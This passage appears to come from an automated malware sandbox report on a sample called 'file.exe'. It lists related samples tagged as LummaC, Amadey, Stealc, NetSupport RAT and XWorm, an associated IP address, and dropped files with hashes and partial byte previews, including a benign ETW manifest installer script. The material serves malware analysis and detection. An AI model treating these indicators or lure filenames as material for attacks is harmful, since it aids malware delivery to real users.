                                                                                                          E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                          • 104.21.85.194
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.85.194
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                          • 104.21.85.194
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                          • 104.21.85.194
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                          • 104.21.85.194
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                          • 104.21.85.194
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                          • 104.21.85.194
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmpWIN_SCM_RDM_INSTALL_4.0.4.0.EXEGet hashmaliciousUnknownBrowse
                                                                                                            WIN_SCM_RDM_INSTALL_4.0.4.0.EXEGet hashmaliciousUnknownBrowse
                                                                                                              Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                  https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                                    Setup_DigiSignerOne_x86.exeGet hashmaliciousHavocBrowse
                                                                                                                      XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                                                        Reminder.exeGet hashmaliciousAmadeyBrowse
                                                                                                                          Reminder.exeGet hashmaliciousAmadeyBrowse
                                                                                                                            Reminder.exeGet hashmaliciousAmadeyBrowse
                                                                                                                              C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dllReminder.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                Reminder.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                  Reminder.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                    MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zipGet hashmaliciousXmrigBrowse
                                                                                                                                      Reminder.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                        Reminder.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                          AX3-GUI-45.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            Defender_Update_Setup_778795.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              AX3-GUI-45.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                Windows7_Activator.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  Process:C:\Users\user\AppData\Local\hangbird\Updater.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):510574
                                                                                                                                                  Entropy (8bit):6.622727339019667
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:q40MCF2RHzA4JoHwatPBVd1LCoD1aE/and8as/CmbO:30MCFmyQoJVjNaYa/mbO
                                                                                                                                                  MD5:BD2302F160B9895DD7BCF9C7DFA9BEA7
                                                                                                                                                  SHA1:8FCB264280A30CC5F959D54AE75AE394054CA5A0
                                                                                                                                                  SHA-256:3EAFF063360A89395B52681248A64AA2A8ACCA6DA13EAA0194DB004FA2A612C0
                                                                                                                                                  SHA-512:2847C9E4233A5F5A662027D46EE04EB4D79AD937FBDDDC54B16E72547E34414094FF56BC08016FCF31BA5769CFCA2D7849AD3EDEA438C57B34402F1E105852E6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:P)y............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................P)y......................................
                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3366912
                                                                                                                                                  Entropy (8bit):6.530560980862899
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                                                                                                                  MD5:945EC37B9971C5E9F26FAFAD6EDFD46E
                                                                                                                                                  SHA1:35AEEEDFAB069194AA41F64DF0E96780C30837B4
                                                                                                                                                  SHA-256:C2E55AA7241DDE41ED9690BD369E62A49D78AD2662C500509FF88FF8342A487F
                                                                                                                                                  SHA-512:283F3E98DEF0B0F249C5B7CB1D6C0DEB6FE922D3D4A68EDF180E791A96F7C18C678E7B4848B5FB03B6C25038BE9850B815B426674A93EA410C430CB261A3F226
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):29472
                                                                                                                                                  Entropy (8bit):7.042110181107409
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:BD7FEAbd+EDsIOmF+OiR9rikW/F+M9OAriXiRQU:M07sIOYRiPWkWNl9WXil
                                                                                                                                                  MD5:077CB4461A2767383B317EB0C50F5F13
                                                                                                                                                  SHA1:584E64F1D162398B7F377CE55A6B5740379C4282
                                                                                                                                                  SHA-256:8287D0E287A66EE78537C8D1D98E426562B95C50F569B92CEA9CE36A9FA57E64
                                                                                                                                                  SHA-512:B1FCB0265697561EF497E6A60FCEE99DC5EA0CF02B4010DA9F5ED93BCE88BDFEA6BFE823A017487B8059158464EA29636AAD8E5F9DD1E8B8A1B6EAAAB670E547
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zip, Detection: malicious, Browse
                                                                                                                                                  • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Defender_Update_Setup_778795.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Windows7_Activator.exe, Detection: malicious, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(....................4.. ?...@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6144
                                                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: WIN_SCM_RDM_INSTALL_4.0.4.0.EXE, Detection: malicious, Browse
                                                                                                                                                  • Filename: WIN_SCM_RDM_INSTALL_4.0.4.0.EXE, Detection: malicious, Browse
                                                                                                                                                  • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Advanced_IP_Scanner_2.5.4594.12.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                  • Filename: Setup_DigiSignerOne_x86.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: XS_Trade_AI-newest_release_.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Reminder.exe, Detection: malicious, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3366912
                                                                                                                                                  Entropy (8bit):6.530560980862899
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                                                                                                                  MD5:945EC37B9971C5E9F26FAFAD6EDFD46E
                                                                                                                                                  SHA1:35AEEEDFAB069194AA41F64DF0E96780C30837B4
                                                                                                                                                  SHA-256:C2E55AA7241DDE41ED9690BD369E62A49D78AD2662C500509FF88FF8342A487F
                                                                                                                                                  SHA-512:283F3E98DEF0B0F249C5B7CB1D6C0DEB6FE922D3D4A68EDF180E791A96F7C18C678E7B4848B5FB03B6C25038BE9850B815B426674A93EA410C430CB261A3F226
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):26664
                                                                                                                                                  Entropy (8bit):5.522130132708777
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:K7JTQ85kJnHzfs6h3L9AaI6waxnjgbSHxIYi5Km0f9NfNL1:geHzfsS3xI6lxjmYicm0VND
                                                                                                                                                  MD5:A1632BF8A030FD810D2B716C39297CC5
                                                                                                                                                  SHA1:FE210E233C3218B2224C83CD1D6A985D7C451A38
                                                                                                                                                  SHA-256:30C2F0FC9C37B8A4AF5FE5A946ECF204BDB10FBFB1728FDAB9B00104DAD5AEAC
                                                                                                                                                  SHA-512:C141C3791698FD1F7174D5F5E2D0E7FC8A50815F37835666AE7404E4B6B62F67F907CA94073364374E8CDC1E72FB1413138AFA5708E95CD6309D647774A8C6A5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R.c..R.c.P..R.Rich.R.PE..d...j..c.........." .........@...............................................`............`.......................................................... ...<...........B..(&...........................................................................................rdata..p...........................@..@.rsrc....<... ...>..................@..@....j..c........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...;...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19387
                                                                                                                                                  Entropy (8bit):4.593621921766137
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:LlO4o0Bwx4j7W9RyAKtrlElelyl4lql2lolWlgth0yf1aXgSYC7OcyWod5d7knPS:LtBwq7W9RyAKtrlElelyl4lql2lolWl4
                                                                                                                                                  MD5:990CE7FAE6E9D4DA5B07DA99B8E5C918
                                                                                                                                                  SHA1:571309DF3787B9D80B238E275FC14F6C08581A01
                                                                                                                                                  SHA-256:F52C4DCD61503F74EF1BC7F98CF8BB79963826CCCD35B0EFBFE5E3CAC8D75DD0
                                                                                                                                                  SHA-512:690240495B7D41303D25B60B3DBB668C45C4DD6015F315DB80BA36656EB040A1D59B0D1FEAEC7ECA2AF2FC0C4DBA6BB6504D9B08BBEC40910CFF9EED4294E8DF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml version="1.0"?>..<instrumentationManifest ...xsi:schemaLocation="http://schemas.microsoft.com/win/2004/08/events eventman.xsd"...xmlns="http://schemas.microsoft.com/win/2004/08/events"...xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events"...xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"...xmlns:xs="http://www.w3.org/2001/XMLSchema"...xmlns:trace="http://schemas.microsoft.com/win/2004/08/events/trace"...>...<instrumentation>....<events>.....<provider......name="NVFT-ETW-OPENVR"......guid="{B37F4CA5-5507-42CF-B8C7-BABE280601D2}"......symbol="ETW_PROVIDER_NVFT_OPENVR_GUID"......resourceFileName="NvFrapsOpenVREvents.res"......messageFileName="msg"......>......<maps>.......<valueMap name="APIType">........<map.........message="$(string.Map.Unknown)".........value="0"........./> ........<map.........message="$(string.Map.OGL)".........value="1"........./> ........<map.........message="$(string.Map.VK)".........value="2"........./>........<map.........message="$
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):29472
                                                                                                                                                  Entropy (8bit):7.042110181107409
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:BD7FEAbd+EDsIOmF+OiR9rikW/F+M9OAriXiRQU:M07sIOYRiPWkWNl9WXil
                                                                                                                                                  MD5:077CB4461A2767383B317EB0C50F5F13
                                                                                                                                                  SHA1:584E64F1D162398B7F377CE55A6B5740379C4282
                                                                                                                                                  SHA-256:8287D0E287A66EE78537C8D1D98E426562B95C50F569B92CEA9CE36A9FA57E64
                                                                                                                                                  SHA-512:B1FCB0265697561EF497E6A60FCEE99DC5EA0CF02B4010DA9F5ED93BCE88BDFEA6BFE823A017487B8059158464EA29636AAD8E5F9DD1E8B8A1B6EAAAB670E547
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(....................4.. ?...@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6144
                                                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15400
                                                                                                                                                  Entropy (8bit):6.508481145269509
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:pUQl2bzfzEq+1QmZGdIYiYF80CKRZKx7yhDO4NKzYJzkMDxHtFhFYA1FG:mPIjaIYi5Km0hD9NfNzW
                                                                                                                                                  MD5:BA6DFB6F8E350F05B34E97098766A59F
                                                                                                                                                  SHA1:45FD6CF90130123B24431892E61DD2AFFECCA8C5
                                                                                                                                                  SHA-256:75263FC3534A3162B9E44E353B3C2379169787286DF7B65CB4ADC3D8BFBD533C
                                                                                                                                                  SHA-512:ABC703996A2947F36DC393B896FB7D7A3A0630F4CCEC6FF8F5077519B4FDC4A6464222EB653A5AF5B93D03E7BCCD728EB32D0F863532FE00E140B4904CFBB65F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R...R...R.....R...P...R.Rich..R.PE..d......[.........." .........................................................@............`.......................................................... ..................(&...........................................................................................rdata..p...........................@..@.rsrc........ ......................@..@.......[........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (399), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11436
                                                                                                                                                  Entropy (8bit):3.5736297585775354
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:HEwXjhdOxPUjRPUEvwG5yNq1U6W1ppHrVGtGlGd0pi+o/m/vUjWqkB4BVWeW8vT6:65UjZUhNq1U6mPM+
                                                                                                                                                  MD5:A39215CF85D8B4140CF4ED3E215F87C4
                                                                                                                                                  SHA1:8E6B89FB938F847C02DACF8E767C671D2218727C
                                                                                                                                                  SHA-256:7AA7F8194A0FE5B2A713A610F7C3A22C74E82BFFDB7B13582BC97A8ED23389B7
                                                                                                                                                  SHA-512:2D596634403F5A564314C6CC5D1E6F5A1CE0E9DD3B95502D4F64A2B1D42B3404ADC51AC4F97732EF2A3CD773AD96A3375C7D0BBE05F02AFDA6F5848860965717
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.M.a.n.i.f.e.s.t. .x.s.i.:.s.c.h.e.m.a.L.o.c.a.t.i.o.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s. .e.v.e.n.t.m.a.n...x.s.d.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s.". .x.m.l.n.s.:.w.i.n.=.".h.t.t.p.:././.m.a.n.i.f.e.s.t.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.w.i.n.d.o.w.s./.e.v.e.n.t.s.". .x.m.l.n.s.:.x.s.i.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.-.i.n.s.t.a.n.c.e.". .x.m.l.n.s.:.x.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.2.0.0.1./.X.M.L.S.c.h.e.m.a.". .x.m.l.n.s.:.t.r.a.c.e.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.t.r.a.c.e.".>.......<.i.n.s.t.r.u.m.e.n.t.a.t.i.o.n.>.........<.e.v.e.n.t.s.>...........<.p.r.o.v.i.d.e.r. .n.a.m.e.=.".N.V.I.D.I.A.
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):834
                                                                                                                                                  Entropy (8bit):5.377817544273163
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:MLK3diq6GsFA7iXo0CFi7iA5HSyauf67iyauNtDHxm0DHUvZ90DHUvZcO/B8/M4z:MLKvrsFWyrfwrNcJCM4iY
                                                                                                                                                  MD5:537A7DEEE8B9849D6C5A8552AFD2AAB0
                                                                                                                                                  SHA1:DD8BC220365C62F7BAA47F3993552F16251F1D61
                                                                                                                                                  SHA-256:ADFEABFEAEB1376B3E0FABBFE0C3D76D8A62AFA38D016571357ACA37FF2DDEB6
                                                                                                                                                  SHA-512:FA6CD2D876F0E04267CF6C724AA4F342F81797390EB5F5B136F93BD5FB310681E48902177B53A530C007F29093EA8DFFF79A425B7782CE97D6B16E6FF3AF5B84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:REM Any NVFTDLLXX.dll can be used for installing NvFrapsOpenVR.man....set LIBHTCVIVE_EVENTS_MAN=%CD%\NvFrapsOpenVR.man..set LIBHTCVIVE_PATTERN=NVFTVRDLL*.dll....echo Looking for %LIBHTCVIVE_PATTERN% dll's....for /f "delims=" %%a in ('dir /b /o:d "%LIBHTCVIVE_PATTERN%"') do set LIBHTCVIVE_DLL=%%a....icacls "%LIBHTCVIVE_EVENTS_MAN%" /t /grant Everyone:R..icacls "%CD%\%LIBHTCVIVE_PATTERN%" /t /grant Everyone:R....wevtutil uninstall-manifest "%LIBHTCVIVE_EVENTS_MAN%"..echo wevtutil install-manifest "%LIBHTCVIVE_EVENTS_MAN%" /rf:"%CD%\%LIBHTCVIVE_DLL%" /mf:"%CD%\%LIBHTCVIVE_DLL%"..wevtutil install-manifest "%LIBHTCVIVE_EVENTS_MAN%" /rf:"%CD%\%LIBHTCVIVE_DLL%" /mf:"%CD%\%LIBHTCVIVE_DLL%"..REM make sure it worked..wevtutil get-publisher NVFT-ETW-OPENVR > nul..if %errorlevel% neq 0 exit /b 1..echo Installed %LIBHTCVIVE_EVENTS_MAN%
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):26664
                                                                                                                                                  Entropy (8bit):5.522130132708777
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:K7JTQ85kJnHzfs6h3L9AaI6waxnjgbSHxIYi5Km0f9NfNL1:geHzfsS3xI6lxjmYicm0VND
                                                                                                                                                  MD5:A1632BF8A030FD810D2B716C39297CC5
                                                                                                                                                  SHA1:FE210E233C3218B2224C83CD1D6A985D7C451A38
                                                                                                                                                  SHA-256:30C2F0FC9C37B8A4AF5FE5A946ECF204BDB10FBFB1728FDAB9B00104DAD5AEAC
                                                                                                                                                  SHA-512:C141C3791698FD1F7174D5F5E2D0E7FC8A50815F37835666AE7404E4B6B62F67F907CA94073364374E8CDC1E72FB1413138AFA5708E95CD6309D647774A8C6A5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R.c..R.c.P..R.Rich.R.PE..d...j..c.........." .........@...............................................`............`.......................................................... ...<...........B..(&...........................................................................................rdata..p...........................@..@.rsrc....<... ...>..................@..@....j..c........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...;...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):834
                                                                                                                                                  Entropy (8bit):5.377817544273163
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:MLK3diq6GsFA7iXo0CFi7iA5HSyauf67iyauNtDHxm0DHUvZ90DHUvZcO/B8/M4z:MLKvrsFWyrfwrNcJCM4iY
                                                                                                                                                  MD5:537A7DEEE8B9849D6C5A8552AFD2AAB0
                                                                                                                                                  SHA1:DD8BC220365C62F7BAA47F3993552F16251F1D61
                                                                                                                                                  SHA-256:ADFEABFEAEB1376B3E0FABBFE0C3D76D8A62AFA38D016571357ACA37FF2DDEB6
                                                                                                                                                  SHA-512:FA6CD2D876F0E04267CF6C724AA4F342F81797390EB5F5B136F93BD5FB310681E48902177B53A530C007F29093EA8DFFF79A425B7782CE97D6B16E6FF3AF5B84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:REM Any NVFTDLLXX.dll can be used for installing NvFrapsOpenVR.man....set LIBHTCVIVE_EVENTS_MAN=%CD%\NvFrapsOpenVR.man..set LIBHTCVIVE_PATTERN=NVFTVRDLL*.dll....echo Looking for %LIBHTCVIVE_PATTERN% dll's....for /f "delims=" %%a in ('dir /b /o:d "%LIBHTCVIVE_PATTERN%"') do set LIBHTCVIVE_DLL=%%a....icacls "%LIBHTCVIVE_EVENTS_MAN%" /t /grant Everyone:R..icacls "%CD%\%LIBHTCVIVE_PATTERN%" /t /grant Everyone:R....wevtutil uninstall-manifest "%LIBHTCVIVE_EVENTS_MAN%"..echo wevtutil install-manifest "%LIBHTCVIVE_EVENTS_MAN%" /rf:"%CD%\%LIBHTCVIVE_DLL%" /mf:"%CD%\%LIBHTCVIVE_DLL%"..wevtutil install-manifest "%LIBHTCVIVE_EVENTS_MAN%" /rf:"%CD%\%LIBHTCVIVE_DLL%" /mf:"%CD%\%LIBHTCVIVE_DLL%"..REM make sure it worked..wevtutil get-publisher NVFT-ETW-OPENVR > nul..if %errorlevel% neq 0 exit /b 1..echo Installed %LIBHTCVIVE_EVENTS_MAN%
                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):19387
                                                                                                                                                  Entropy (8bit):4.593621921766137
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:LlO4o0Bwx4j7W9RyAKtrlElelyl4lql2lolWlgth0yf1aXgSYC7OcyWod5d7knPS:LtBwq7W9RyAKtrlElelyl4lql2lolWl4
                                                                                                                                                  MD5:990CE7FAE6E9D4DA5B07DA99B8E5C918
                                                                                                                                                  SHA1:571309DF3787B9D80B238E275FC14F6C08581A01
